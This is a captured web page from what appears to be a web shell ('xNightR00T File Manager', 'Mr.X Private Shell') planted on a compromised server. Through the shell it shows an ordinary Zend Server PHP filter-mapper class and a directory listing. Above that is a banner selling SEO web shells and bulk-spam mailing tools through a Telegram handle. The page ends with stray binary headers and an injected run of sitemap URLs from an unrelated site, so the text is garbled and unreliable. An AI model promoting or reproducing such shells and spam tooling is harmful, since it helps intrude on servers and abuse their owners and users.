xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace ZendServer\Filter;

use Configuration\MapperAbstract;
use ZendServer\Log\Log;
use Zend\Json\Json;

class Mapper extends MapperAbstract
{

    /**
     *
     * @param string $type
     * @throws \Exception
     * @return \ZendServer\Filter\FilterList
     */
    public function getByType($type)
    {
        if (!in_array($type, Filter::$types)) {
            throw new \Exception('Filters of type '.$type." does not exists");
        }

        $select = new \Zend\Db\Sql\Select();
        $select->from($this->getTableGateway()->getTable());
        $select->where(array("filter_type = ?" => $type));
        $select->order(array('custom', 'name'));
        return new FilterList($this->selectWith($select));
    }

    /**
     * 
     * @param int $id
     * @return \ZendServer\Filter\FilterList
     */
    public function getById($id)
    {
        $select = new \Zend\Db\Sql\Select();
        $select->from($this->getTableGateway()->getTable());
        $select->where(array("id = ?" => $id));
        return new FilterList($this->selectWith($select));
    }

    /**
     * @param string $name
     * @return integer
     */
    public function deleteFilterByName($name)
    {
        return $this->delete(array('name = ?' => $name));
    }

    /**
     *
     * @param string $name
     * @return \ZendServer\Filter\FilterList
     */
    public function getByName($name)
    {
        $select = new \Zend\Db\Sql\Select();
        $select->from($this->getTableGateway()->getTable());
        $select->where(array("name = ?" => $name));

        return new FilterList($this->selectWith($select));
    }

    /**
     *
     * @param string $type
     * @param string $name
     * @return \ZendServer\Filter\FilterList
     */
    public function getByTypeAndName($type, $name)
    {
        if (!in_array($type, Filter::$types)) {
            throw new \Exception('Filters of type '.$type." does not exists");
        }

        $select = new \Zend\Db\Sql\Select();
        $select->from($this->getTableGateway()->getTable());
        $select->where(array("filter_type = ?" => $type));
        $select->where(array("name = ?" => $name));

        return new FilterList($this->selectWith($select));
    }

    /**
     * Update/Insert new row
     * @param Filter $filter
     * @return number
     */
    public function upsert(Filter $filter)
    {
        $params = array(
            'filter_type' => $filter->getType(),
            'name' => $filter->getName(),
            'data' => Json::encode($filter->getData(), Json::TYPE_ARRAY),
            'custom' => 1,
        );
        if ($filter->getId()) {
            $this->update($params, array('id = ?' => $filter->getId()));
            return $filter->getId();
        }
        return $this->insert($params);
    }
    
    public function getFilterIds($type=null)
    {
        $select = new \Zend\Db\Sql\Select();
        $select->from($this->getTableGateway()->getTable());
        $select->columns(array('id'));
        if ($type) {
            $select->where(array("filter_type = ?" => $type));
        }
        return $this->selectWith($select);
    }
    
    public function getFilterNames($type=null)
    {
        $select = new \Zend\Db\Sql\Select();
        $select->from($this->getTableGateway()->getTable());
        $select->columns(array('name'));
        if ($type) {
            $select->where(array("filter_type = ?" => $type));
        }
        return $this->selectWith($select);
    }
    
}

Filemanager

Name Type Size Permission Actions
Controller Folder 0755
View Folder 0755
Factory.php File 553 B 0644
Filter.php File 2.66 KB 0644
FilterInterface.php File 98 B 0644
FilterList.php File 507 B 0644
Mapper.php File 3.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml